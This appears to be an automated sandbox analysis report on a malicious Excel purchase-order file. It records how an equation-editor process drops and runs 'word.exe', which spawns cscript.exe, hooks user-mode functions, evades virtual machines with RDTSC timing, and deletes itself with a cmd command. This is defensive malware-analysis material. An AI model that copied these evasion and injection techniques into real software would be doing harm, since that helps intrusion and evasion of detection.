Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A2579A		5_2_00A2579A
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009D57C3		5_2_009D57C3
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A3F8EE		5_2_00A3F8EE
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A1F8C4		5_2_00A1F8C4
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009AC85C		5_2_009AC85C
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009C286D		5_2_009C286D
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009A29B2		5_2_009A29B2
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A4098E		5_2_00A4098E
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009B69FE		5_2_009B69FE
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A2394B		5_2_00A2394B
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A25955		5_2_00A25955
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A53A83		5_2_00A53A83
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A4CBA4		5_2_00A4CBA4
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0099FBD7		5_2_0099FBD7
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A26BCB		5_2_00A26BCB
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00A2DBDA		5_2_00A2DBDA
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009C7B00		5_2_009C7B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023A1238		7_2_023A1238
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022FE2E9		7_2_022FE2E9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02302305		7_2_02302305
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0234A37B		7_2_0234A37B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02307353		7_2_02307353
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023A63BF		7_2_023A63BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022FF3CF		7_2_022FF3CF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023263DB		7_2_023263DB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0232D005		7_2_0232D005
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231905A		7_2_0231905A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02303040		7_2_02303040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022FE0C6		7_2_022FE0C6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0234A634		7_2_0234A634
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023A2622		7_2_023A2622
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02304680		7_2_02304680
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0230E6C1		7_2_0230E6C1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0230C7BC		7_2_0230C7BC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0238579A		7_2_0238579A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023357C3		7_2_023357C3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0233D47D		7_2_0233D47D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02335485		7_2_02335485
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02311489		7_2_02311489
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0230351F		7_2_0230351F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02346540		7_2_02346540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231C5F0		7_2_0231C5F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023B3A83		7_2_023B3A83
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02327B00		7_2_02327B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023ACBA4		7_2_023ACBA4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0238DBDA		7_2_0238DBDA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022FFBD7		7_2_022FFBD7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0232286D		7_2_0232286D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0230C85C		7_2_0230C85C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0239F8EE		7_2_0239F8EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02385955		7_2_02385955
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023029B2		7_2_023029B2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023A098E		7_2_023A098E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023169FE		7_2_023169FE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02332E2F		7_2_02332E2F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231EE4C		7_2_0231EE4C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02310F3F		7_2_02310F3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0232DF7C		7_2_0232DF7C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0239CFB1		7_2_0239CFB1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02330D3B		7_2_02330D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0230CD5B		7_2_0230CD5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0239FDDD		7_2_0239FDDD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008E79A		7_2_0008E79A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008D7DE		7_2_0008D7DE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008EB71		7_2_0008EB71
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00072D90		7_2_00072D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00079E4B		7_2_00079E4B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00079E50		7_2_00079E50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008EEB5		7_2_0008EEB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00072FB0		7_2_00072FB0

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: String function: 0099DF5C appears 95 times
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: String function: 00A0F970 appears 60 times
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: String function: 0099E2A8 appears 31 times
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: String function: 009E373B appears 185 times
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: String function: 009E3F92 appears 85 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 02343F92 appears 132 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0234373B appears 238 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 022FE2A8 appears 38 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0236F970 appears 83 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 022FDF5C appears 119 times

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041A350 NtCreateFile,		5_2_0041A350
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041A400 NtReadFile,		5_2_0041A400
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041A480 NtClose,		5_2_0041A480
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041A530 NtAllocateVirtualMemory,		5_2_0041A530
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041A34A NtCreateFile,		5_2_0041A34A
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041A3FB NtReadFile,		5_2_0041A3FB
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041A47B NtClose,		5_2_0041A47B
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009900C4 NtCreateFile,LdrInitializeThunk,		5_2_009900C4
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00990048 NtProtectVirtualMemory,LdrInitializeThunk,		5_2_00990048
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00990078 NtResumeThread,LdrInitializeThunk,		5_2_00990078
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098F9F0 NtClose,LdrInitializeThunk,		5_2_0098F9F0
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098F900 NtReadFile,LdrInitializeThunk,		5_2_0098F900
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_0098FAD0
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FAE8 NtQueryInformationProcess,LdrInitializeThunk,		5_2_0098FAE8
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FBB8 NtQueryInformationToken,LdrInitializeThunk,		5_2_0098FBB8
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FB68 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_0098FB68
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FC90 NtUnmapViewOfSection,LdrInitializeThunk,		5_2_0098FC90
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FC60 NtMapViewOfSection,LdrInitializeThunk,		5_2_0098FC60
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FD8C NtDelayExecution,LdrInitializeThunk,		5_2_0098FD8C
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FDC0 NtQuerySystemInformation,LdrInitializeThunk,		5_2_0098FDC0
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FEA0 NtReadVirtualMemory,LdrInitializeThunk,		5_2_0098FEA0
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_0098FED0
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FFB4 NtCreateSection,LdrInitializeThunk,		5_2_0098FFB4
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009910D0 NtOpenProcessToken,		5_2_009910D0
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00990060 NtQuerySection,		5_2_00990060
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009901D4 NtSetValueKey,		5_2_009901D4
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0099010C NtOpenDirectoryObject,		5_2_0099010C
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00991148 NtOpenThread,		5_2_00991148
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_009907AC NtCreateMutant,		5_2_009907AC
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098F8CC NtWaitForSingleObject,		5_2_0098F8CC
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098F938 NtWriteFile,		5_2_0098F938
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00991930 NtSetContextThread,		5_2_00991930
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FAB8 NtQueryValueKey,		5_2_0098FAB8
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FA20 NtQueryInformationFile,		5_2_0098FA20
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FA50 NtEnumerateValueKey,		5_2_0098FA50
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0098FBE8 NtQueryVirtualMemory,		5_2_0098FBE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F00C4 NtCreateFile,LdrInitializeThunk,		7_2_022F00C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F07AC NtCreateMutant,LdrInitializeThunk,		7_2_022F07AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFAB8 NtQueryValueKey,LdrInitializeThunk,		7_2_022EFAB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_022EFAE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_022EFAD0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_022EFB68
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFB50 NtCreateKey,LdrInitializeThunk,		7_2_022EFB50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_022EFBB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EF900 NtReadFile,LdrInitializeThunk,		7_2_022EF900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EF9F0 NtClose,LdrInitializeThunk,		7_2_022EF9F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_022EFED0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFFB4 NtCreateSection,LdrInitializeThunk,		7_2_022EFFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_022EFC60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFD8C NtDelayExecution,LdrInitializeThunk,		7_2_022EFD8C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_022EFDC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F0060 NtQuerySection,		7_2_022F0060
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F0078 NtResumeThread,		7_2_022F0078
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F0048 NtProtectVirtualMemory,		7_2_022F0048
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F10D0 NtOpenProcessToken,		7_2_022F10D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F010C NtOpenDirectoryObject,		7_2_022F010C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F1148 NtOpenThread,		7_2_022F1148
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F01D4 NtSetValueKey,		7_2_022F01D4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFA20 NtQueryInformationFile,		7_2_022EFA20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFA50 NtEnumerateValueKey,		7_2_022EFA50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFBE8 NtQueryVirtualMemory,		7_2_022EFBE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EF8CC NtWaitForSingleObject,		7_2_022EF8CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EF938 NtWriteFile,		7_2_022EF938
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F1930 NtSetContextThread,		7_2_022F1930
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFE24 NtWriteVirtualMemory,		7_2_022EFE24
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFEA0 NtReadVirtualMemory,		7_2_022EFEA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFF34 NtQueueApcThread,		7_2_022EFF34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFFFC NtCreateProcessEx,		7_2_022EFFFC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFC30 NtOpenProcess,		7_2_022EFC30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFC48 NtSetInformationFile,		7_2_022EFC48
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F0C40 NtGetContextThread,		7_2_022F0C40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFC90 NtUnmapViewOfSection,		7_2_022EFC90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022EFD5C NtEnumerateKey,		7_2_022EFD5C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022F1D80 NtSuspendThread,		7_2_022F1D80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A350 NtCreateFile,		7_2_0008A350
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A400 NtReadFile,		7_2_0008A400
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A480 NtClose,		7_2_0008A480
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A530 NtAllocateVirtualMemory,		7_2_0008A530
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A34A NtCreateFile,		7_2_0008A34A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A3FB NtReadFile,		7_2_0008A3FB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A47B NtClose,		7_2_0008A47B

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: 5C24.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll 9679F0E8F63974D80F953B8212B2668C27EC9762CDCF6ACBFD4FDF4B6D189F23

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Sample is known by Antivirus

Source: HME AG PO 2091.xlsx	Virustotal: Detection: 42%
Source: HME AG PO 2091.xlsx	ReversingLabs: Detection: 32%

Reads software policies

Source: C:\Users\user\AppData\Roaming\word.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exe	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\word.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\word.exe"			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\AppData\Roaming\word.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$HME AG PO 2091.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREA4E.tmp

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/9@3/3

Contains functionality to instantiate COM classes

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,

4_2_00402012

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Contains functionality to check free disk space

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_00404275

Binary contains paths to development resources

Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Submission file is bigger than most known malware samples

Source: HME AG PO 2091.xlsx

Static file information: File size 1703303 > 1048576

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: word.exe, word.exe, 00000005.00000002.519963830.0000000000980000.00000040.00000001.sdmp, word.exe, 00000005.00000003.460762852.0000000000230000.00000004.00000001.sdmp, word.exe, 00000005.00000002.520313707.0000000000B00000.00000040.00000001.sdmp, word.exe, 00000005.00000003.461783755.0000000000440000.00000004.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000002.674110480.00000000022E0000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.674256925.0000000002460000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.517708547.0000000001FF0000.00000004.00000001.sdmp
Source:	Binary string: cscript.pdbN source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp
Source:	Binary string: cscript.pdb source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp

Document has a 'vbamacros' value indicative of goodware

Source: HME AG PO 2091.xlsx

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_73291000 push eax; ret		4_2_7329102E
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041E9E6 push edx; ret		5_2_0041E9EE
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00416B6D push ebx; ret		5_2_00416B85
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041D4F2 push eax; ret		5_2_0041D4F8
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041D4FB push eax; ret		5_2_0041D562
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041D4A5 push eax; ret		5_2_0041D4F8
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041D55C push eax; ret		5_2_0041D562
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0041EEB5 push esi; ret		5_2_0041F0D9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_022FDFA1 push ecx; ret		7_2_022FDFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008D4A5 push eax; ret		7_2_0008D4F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008D4FB push eax; ret		7_2_0008D562
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008D4F2 push eax; ret		7_2_0008D4F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008D55C push eax; ret		7_2_0008D562
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008E9E6 push edx; ret		7_2_0008E9EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00086B6D push ebx; ret		7_2_00086B85
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008EEB5 push esi; ret		7_2_0008F0D9

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405DA3

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\word.exe	File created: C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\word.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEF

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\word.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
